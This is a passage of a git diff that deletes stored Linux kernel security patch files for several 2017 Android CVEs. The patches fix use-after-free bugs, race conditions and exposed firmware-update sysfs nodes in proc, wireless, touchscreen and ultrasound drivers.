-[<ffffffc0003c7518>] __asan_load8+0x20/0x7c
-[<ffffffc00025a54c>] task_tgid_nr_ns+0x28/0x44
-[<ffffffc00046951c>] proc_pid_status+0x444/0x1080
-[<ffffffc000460f60>] proc_single_show+0x8c/0xdc
-[<ffffffc0004081b0>] seq_read+0x2e8/0x6f0
-[<ffffffc0003d1420>] vfs_read+0xd8/0x1e0
-[<ffffffc0003d1b98>] SyS_read+0x68/0xd4
-
-Accessing group_leader while holding rcu_lock and using the now safe
-helpers introduced in the commit mentioned, this race condition is
-addressed.
-
-Signed-off-by: Adrian Salido <salidoa@google.com>
-Change-Id: I4315217922dda375a30a3581c0c1740dda7b531b
-Bug: 31495866
----
- fs/proc/array.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/fs/proc/array.c b/fs/proc/array.c
-index 09f0d9c374a32..6ed95802239df 100644
---- a/fs/proc/array.c
-+++ b/fs/proc/array.c
-@@ -168,16 +168,16 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- 	int g;
- 	struct fdtable *fdt = NULL;
- 	const struct cred *cred;
--	pid_t ppid, tpid;
-+	pid_t ppid = 0, tpid = 0;
-+	struct task_struct *leader = NULL;
- 
- 	rcu_read_lock();
--	ppid = pid_alive(p) ?
--		task_tgid_nr_ns(rcu_dereference(p->real_parent), ns) : 0;
--	tpid = 0;
- 	if (pid_alive(p)) {
- 		struct task_struct *tracer = ptrace_parent(p);
- 		if (tracer)
- 			tpid = task_pid_nr_ns(tracer, ns);
-+		ppid = task_tgid_nr_ns(rcu_dereference(p->real_parent), ns);
-+		leader = p->group_leader;
- 	}
- 	cred = get_task_cred(p);
- 	seq_printf(m,
-@@ -189,7 +189,7 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- 		"Uid:\t%d\t%d\t%d\t%d\n"
- 		"Gid:\t%d\t%d\t%d\t%d\n",
- 		get_task_state(p),
--		task_tgid_nr_ns(p, ns),
-+		leader ? task_pid_nr_ns(leader, ns) : 0,
- 		pid_nr_ns(pid, ns),
- 		ppid, tpid,
- 		from_kuid_munged(user_ns, cred->uid),
diff --git a/Patches/Linux_CVEs/CVE-2017-0427/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0427/3.18/0002.patch
deleted file mode 100644
index f54f373a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0427/3.18/0002.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 1d6d364ee174676a225a77dc7ca8dac887199718 Mon Sep 17 00:00:00 2001
-From: Adrian Salido <salidoa@google.com>
-Date: Thu, 1 Dec 2016 18:07:42 -0800
-Subject: [PATCH] fs/proc/array.c: make safe access to group_leader
-
-As mentioned in commit 52ee2dfdd4f51cf422ea6a96a0846dc94244aa37
-("pids: refactor vnr/nr_ns helpers to make them safe"). *_nr_ns
-helpers used to be buggy. The commit addresses most of the helpers but
-is missing task_tgid_xxx()
-
-Without this protection there is a possible use after free reported by
-kasan instrumented kernel:
-
-==================================================================
-BUG: KASAN: use-after-free in task_tgid_nr_ns+0x2c/0x44 at addr ***
-Read of size 8 by task cat/2472
-CPU: 1 PID: 2472 Comm: cat Tainted: ****
-Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
-Call trace:
-[<ffffffc00020ad2c>] dump_backtrace+0x0/0x17c
-[<ffffffc00020aec0>] show_stack+0x18/0x24
-[<ffffffc0011573d0>] dump_stack+0x94/0x100
-[<ffffffc0003c7dc0>] kasan_report+0x308/0x554
-[<ffffffc0003c7518>] __asan_load8+0x20/0x7c
-[<ffffffc00025a54c>] task_tgid_nr_ns+0x28/0x44
-[<ffffffc00046951c>] proc_pid_status+0x444/0x1080
-[<ffffffc000460f60>] proc_single_show+0x8c/0xdc
-[<ffffffc0004081b0>] seq_read+0x2e8/0x6f0
-[<ffffffc0003d1420>] vfs_read+0xd8/0x1e0
-[<ffffffc0003d1b98>] SyS_read+0x68/0xd4
-
-Accessing group_leader while holding rcu_lock and using the now safe
-helpers introduced in the commit mentioned, this race condition is
-addressed.
-
-Signed-off-by: Adrian Salido <salidoa@google.com>
-Change-Id: I4315217922dda375a30a3581c0c1740dda7b531b
-Bug: 31495866
----
- fs/proc/array.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/fs/proc/array.c b/fs/proc/array.c
-index 864f2e52cf1bc..6307f8774a11d 100644
---- a/fs/proc/array.c
-+++ b/fs/proc/array.c
-@@ -159,16 +159,16 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- 	int g;
- 	struct fdtable *fdt = NULL;
- 	const struct cred *cred;
--	pid_t ppid, tpid;
-+	pid_t ppid = 0, tpid = 0;
-+	struct task_struct *leader = NULL;
- 
- 	rcu_read_lock();
--	ppid = pid_alive(p) ?
--		task_tgid_nr_ns(rcu_dereference(p->real_parent), ns) : 0;
--	tpid = 0;
- 	if (pid_alive(p)) {
- 		struct task_struct *tracer = ptrace_parent(p);
- 		if (tracer)
- 			tpid = task_pid_nr_ns(tracer, ns);
-+		ppid = task_tgid_nr_ns(rcu_dereference(p->real_parent), ns);
-+		leader = p->group_leader;
- 	}
- 	cred = get_task_cred(p);
- 	seq_printf(m,
-@@ -181,7 +181,7 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- 		"Gid:\t%d\t%d\t%d\t%d\n"
- 		"Ngid:\t%d\n",
- 		get_task_state(p),
--		task_tgid_nr_ns(p, ns),
-+		leader ? task_pid_nr_ns(leader, ns) : 0,
- 		pid_nr_ns(pid, ns),
- 		ppid, tpid,
- 		from_kuid_munged(user_ns, cred->uid),
diff --git a/Patches/Linux_CVEs/CVE-2017-0430/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0430/ANY/0001.patch
deleted file mode 100644
index 0e8a3d80..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0430/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 709105c301aa53fb86c46b36f882998558b19652 Mon Sep 17 00:00:00 2001
-From: Greg Hackmann <ghackmann@google.com>
-Date: Tue, 15 Nov 2016 15:17:24 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix use-after-free in
- _dhd_pno_get_for_batch()
-
-Bug: 32838767
-Change-Id: I987b07c30b3ed76865a002e7c154a5fa36b1bf29
-Signed-off-by: Greg Hackmann <ghackmann@google.com>
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 3e4c6d8191f47..93642ed12bc04 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3069,9 +3069,10 @@ _dhd_pno_get_for_batch(dhd_pub_t *dhd, char *buf, int bufsize, int reason)
- 		list_del(&pscan_results->list);
- 		MFREE(dhd->osh, pscan_results, SCAN_RESULTS_SIZE);
- 		_params->params_batch.get_batch.top_node_cnt--;
-+	} else {
-+		/* increase total scan count using current scan count */
-+		_params->params_batch.get_batch.tot_scan_cnt += pscan_results->cnt_header;
- 	}
--	/* increase total scan count using current scan count */
--	_params->params_batch.get_batch.tot_scan_cnt += pscan_results->cnt_header;
- 
- 	if (buf && bufsize) {
- 		/* This is a first try to get batching results */
diff --git a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0433/ANY/0001.patch
deleted file mode 100644
index ed4d450e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0001.patch
+++ /dev/null
@@ -1,181 +0,0 @@
-From fe160e51f02ee5db529c2e84ac8364c89cce005e Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 6 Dec 2016 20:59:01 -0800
-Subject: [PATCH] input: synaptics_dsx: remove some sysfs nodes.
-
-Remove most sysfs entrypoints to fw_update module.
-Retains check_fw, which is triggered from an
-init script.
-
-BUG: 32769717
-Change-Id: I710cb37a8b5382dce7aa6a1d8748be5853a18a7a
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/Kconfig               | 10 ++++++++++
- drivers/input/touchscreen/synaptics_fw_update.c | 20 ++++++++++++++++++++
- 2 files changed, 30 insertions(+)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index a42fea5862af2..64266998c2290 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1019,6 +1019,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE
- 	  To compile this driver as a module, choose M here: the
- 	  module will be called synaptics_dsx_fw_update.
- 
-+config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
-+	bool "Synaptics DSX firmware update extra sysfs attributes"
-+	depends on TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE
-+	help
-+	  Say Y here to enable support for extra sysfs attributes
-+	  supporting firmware update in a development environment.
-+	  This does not affect the core or other subsystem attributes.
-+
-+	  If unsure, say N.
-+
- config SECURE_TOUCH
- 	bool "Secure Touch"
- 	depends on (TOUCHSCREEN_ATMEL_MXT || TOUCHSCREEN_SYNAPTICS_I2C_RMI4 || \
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 8891f1c836684..360e455a5a51b 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -1331,6 +1331,7 @@ static int fwu_do_write_config(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static int fwu_start_write_config(void)
- {
- 	int retval;
-@@ -1383,6 +1384,7 @@ static int fwu_start_write_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_write_lockdown(bool reset)
- {
-@@ -1430,6 +1432,7 @@ static int fwu_do_write_lockdown(bool reset)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static int fwu_start_write_lockdown(void)
- {
- 	if (parse_header())
-@@ -1533,6 +1536,7 @@ static int fwu_do_read_config(void)
- exit:
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_reflash(void)
- {
-@@ -1767,6 +1771,7 @@ int synaptics_fw_updater(void)
- }
- EXPORT_SYMBOL(synaptics_fw_updater);
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
-@@ -2021,6 +2026,7 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- 	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
-+#endif
- 
- static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
-@@ -2044,6 +2050,7 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- 	return count;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
- {
-@@ -2265,6 +2272,7 @@ static ssize_t fwu_sysfs_package_id_show(struct device *dev,
- 		(pkg_id[1] << 8) | pkg_id[0],
- 		(pkg_id[3] << 8) | pkg_id[2]);
- }
-+#endif
- 
- static int synaptics_rmi4_debug_dump_info(struct seq_file *m, void *v)
- {
-@@ -2298,6 +2306,7 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- 	return;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static struct bin_attribute dev_attr_data = {
- 	.attr = {
- 		.name = "data",
-@@ -2307,8 +2316,10 @@ static struct bin_attribute dev_attr_data = {
- 	.read = fwu_sysfs_show_image,
- 	.write = fwu_sysfs_store_image,
- };
-+#endif
- 
- static struct device_attribute attrs[] = {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	__ATTR(fw_name, S_IRUGO | S_IWUSR | S_IWGRP,
- 			fwu_sysfs_image_name_show,
- 			fwu_sysfs_image_name_store),
-@@ -2318,9 +2329,11 @@ static struct device_attribute attrs[] = {
- 	__ATTR(update_fw, S_IWUSR | S_IWGRP,
- 			NULL,
- 			fwu_sysfs_do_reflash_store),
-+#endif
- 	__ATTR(check_fw, S_IWUSR | S_IWGRP,
- 			NULL,
- 			fwu_sysfs_check_fw_store),
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	__ATTR(writeconfig, S_IWUSR | S_IWGRP,
- 			NULL,
- 			fwu_sysfs_write_config_store),
-@@ -2360,6 +2373,7 @@ static struct device_attribute attrs[] = {
- 	__ATTR(package_id, S_IRUGO,
- 			fwu_sysfs_package_id_show,
- 			synaptics_rmi4_store_error),
-+#endif
- };
- 
- 
-@@ -2470,6 +2484,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
-@@ -2478,6 +2493,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 				__func__);
- 		goto exit_free_mem;
- 	}
-+#endif
- 
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		retval = sysfs_create_file(&rmi4_data->i2c_client->dev.kobj,
-@@ -2511,7 +2527,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 				&attrs[attr_count].attr);
- 	}
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- exit_free_mem:
- 	kfree(fwu->fn_ptr);
-@@ -2528,7 +2546,9 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
- 	unsigned char attr_count;
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
diff --git a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0433/ANY/0002.patch
deleted file mode 100644
index c2e986ef..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0002.patch
+++ /dev/null
@@ -1,210 +0,0 @@
-From 2615c5f302441568e6dd20007bc5246d72837e80 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 6 Dec 2016 19:19:26 -0800
-Subject: [PATCH] input: synaptics_dsx: remove update sysfs entries
-
-Remove sysfs entrypoints to fw_update module.
-
-BUG: 32769717
-Change-Id: I425761af84ed5c31cc5902b4f49c4981a49f3af0
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/synaptics_dsx25/Kconfig  | 10 ++++++++
- .../synaptics_dsx25/synaptics_dsx_fw_update.c      | 27 ++++++++++++++++++++--
- 2 files changed, 35 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/Kconfig b/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-index 36661fc9d6a2d..218a6c3c96467 100644
---- a/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-+++ b/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-@@ -59,6 +59,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE
- 	  To compile this driver as a module, choose M here: the
- 	  module will be called synaptics_dsx_fw_update.
- 
-+config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
-+	bool "Synaptics DSX firmware update sysfs attributes"
-+	depends on TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE
-+	help
-+	  Say Y here to enable support for sysfs attributes for
-+	  performing firmware update in a development environment.
-+	  This does not affect the core or other subsystem attributes.
-+
-+	  If unsure, say N.
-+
- config TOUCHSCREEN_SYNAPTICS_DSX25_ACTIVE_PEN
- 	tristate "Synaptics DSX active pen module"
- 	depends on TOUCHSCREEN_SYNAPTICS25_DSX_CORE
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 323f65891b458..8cad4d3b3a9d9 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -105,6 +105,7 @@ static int fwu_do_reflash(void);
- 
- static int fwu_recovery_check_status(void);
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count);
-@@ -157,6 +158,7 @@ static ssize_t fwu_sysfs_guest_code_block_count_show(struct device *dev,
- 
- static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count);
-+#endif
- 
- enum f34_version {
- 	F34_V0 = 0,
-@@ -595,6 +597,7 @@ struct synaptics_rmi4_fwu_handle {
- 	struct work_struct fwu_work;
- };
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static struct bin_attribute dev_attr_data = {
- 	.attr = {
- 		.name = "data",
-@@ -652,12 +655,14 @@ static struct device_attribute attrs[] = {
- 			synaptics_rmi4_show_error,
- 			fwu_sysfs_write_guest_code_store),
- };
-+#endif
- 
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(dsx_fwu_remove_complete);
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- DEFINE_MUTEX(fwu_sysfs_mutex);
--
-+#endif
- static bool tp_2k_panel = false;
- /**
-  * early_param: Parse system early startup parameters.
-@@ -3057,6 +3062,7 @@ static int fwu_do_reflash(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_do_read_config(void)
- {
- 	int retval;
-@@ -3136,6 +3142,7 @@ static int fwu_do_read_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_lockdown(void)
- {
-@@ -3173,6 +3180,7 @@ static int fwu_do_lockdown(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_start_write_guest_code(void)
- {
- 	int retval;
-@@ -3348,6 +3356,7 @@ static int fwu_start_write_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static void synaptics_refresh_configid(void)
- {
-@@ -3584,6 +3593,7 @@ static int fwu_recovery_check_status(void)
- 	return 0;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_recovery_erase_all(void)
- {
- 	int retval;
-@@ -3778,6 +3788,7 @@ static int fwu_start_recovery(void)
- 
- 	return retval;
- }
-+#endif
- 
- int synaptics_dsx25_fw_updater(const unsigned char *fw_data)
- {
-@@ -3838,6 +3849,7 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
-@@ -4236,6 +4248,7 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
-+#endif
- 
- static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- 		unsigned char intr_mask)
-@@ -4252,7 +4265,9 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- {
- 	int retval;
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	unsigned char attr_count;
-+#endif
- 	struct pdt_properties pdt_props;
- 
- 	if (fwu) {
-@@ -4319,6 +4334,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 			&fwu->fwu_work);
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
- 				       &dev_attr_data);
- 	if (retval < 0) {
-@@ -4339,9 +4355,11 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 			goto exit_remove_attrs;
- 		}
- 	}
-+#endif
- 
- 	return 0;
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- exit_remove_attrs:
- 	for (attr_count--; attr_count >= 0; attr_count--) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
-@@ -4349,8 +4367,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	}
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
--
- exit_destroy_work:
-+#endif
-+
- #ifdef DO_STARTUP_FW_UPDATE
- 	cancel_work_sync(&fwu->fwu_work);
- 	flush_workqueue(fwu->fwu_workqueue);
-@@ -4370,7 +4389,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 
- static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	unsigned char attr_count;
-+#endif
- 
- 	if (!fwu)
- 		goto exit;
-@@ -4381,12 +4402,14 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- 	destroy_workqueue(fwu->fwu_workqueue);
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
- 				&attrs[attr_count].attr);
- 	}
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- 	kfree(fwu->read_config_buf);
- 	kfree(fwu->image_name);
diff --git a/Patches/Linux_CVEs/CVE-2017-0434/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0434/3.18/0001.patch
deleted file mode 100644
index 72cf9708..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0434/3.18/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From d740e7228bd1578ed01762998b2a86e7df56e608 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 2 Dec 2016 20:49:26 -0800
-Subject: [PATCH] input: synaptics_dsx: reallocate buffer under lock.
-
-Prevent concurrent usage & re-allocation of the wr_buf variable.
-Based off patch by chengengjia <chengjia4574@gmail.com>.
-
-BUG: 33001936
-Change-Id: I88d78e1ec0fc9e88b1e6824c06161b67d01136ec
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c
-index 5312f86a93470..3acd4d54bb6d5 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c
-@@ -557,11 +557,11 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- 	struct i2c_client *i2c = to_i2c_client(rmi4_data->pdev->dev.parent);
- 	struct i2c_msg msg[1];
- 
-+	mutex_lock(&rmi4_data->rmi4_io_ctrl_mutex);
-+
- 	retval = synaptics_rmi4_i2c_alloc_buf(rmi4_data, length + 1);
- 	if (retval < 0)
--		return retval;
--
--	mutex_lock(&rmi4_data->rmi4_io_ctrl_mutex);
-+		goto exit;
- 
- 	retval = synaptics_rmi4_i2c_set_page(rmi4_data, addr);
- 	if (retval != PAGE_SELECT_LEN) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0435/ANY/0001.patch
deleted file mode 100644
index 5651b6b3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From ce9db0874906f6aedd80bb28d457eadfe38bdd02 Mon Sep 17 00:00:00 2001
-From: Sudheer Papothi <spapothi@codeaurora.org>
-Date: Wed, 26 Oct 2016 01:07:04 +0530
-Subject: drivers: qcom: ultrasound: Lock async driver calls
-
-Adds lock to ioctl and other external calls to driver.
-Adds missing null check in __usf_set_stream_param.
-
-Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad
-Signed-off-by: Sudheer Papothi <spapothi@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++----
- 1 file changed, 59 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-index d535ccb..9270dbc 100644
---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-@@ -22,6 +22,7 @@
- #include <linux/uaccess.h>
- #include <linux/time.h>
- #include <linux/kmemleak.h>
-+#include <linux/mutex.h>
- #include <sound/apr_audio.h>
- #include <linux/qdsp6v2/usf.h>
- #include "q6usm.h"
-@@ -128,6 +129,8 @@ struct usf_type {
- 	uint16_t conflicting_event_filters;
- 	/* The requested buttons bitmap */
- 	uint16_t req_buttons_bitmap;
-+	/* Mutex for exclusive operations (all public APIs) */
-+	struct mutex mutex;
- };
- 
- struct usf_input_dev_type {
-@@ -1376,9 +1379,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx,
- 				int dir)
- {
- 	struct us_client *usc = usf_xx->usc;
--	struct us_port_data *port = &usc->port[dir];
-+	struct us_port_data *port;
- 	int rc = 0;
- 
-+	if (usc == NULL) {
-+		pr_err("%s: usc is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
-+	port = &usc->port[dir];
-+	if (port == NULL) {
-+		pr_err("%s: port is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
- 	if (port->param_buf == NULL) {
- 		pr_err("%s: parameter buffer is null\n",
- 			__func__);
-@@ -1503,10 +1519,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param */
- 
--static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long __usf_ioctl(struct usf_type *usf,
-+		unsigned int cmd,
-+		unsigned long arg)
- {
-+
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -1669,6 +1687,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_ioctl */
-+
-+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_ioctl */
- 
- #ifdef CONFIG_COMPAT
-@@ -2106,12 +2136,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param32 */
- 
--static long usf_compat_ioctl(struct file *file,
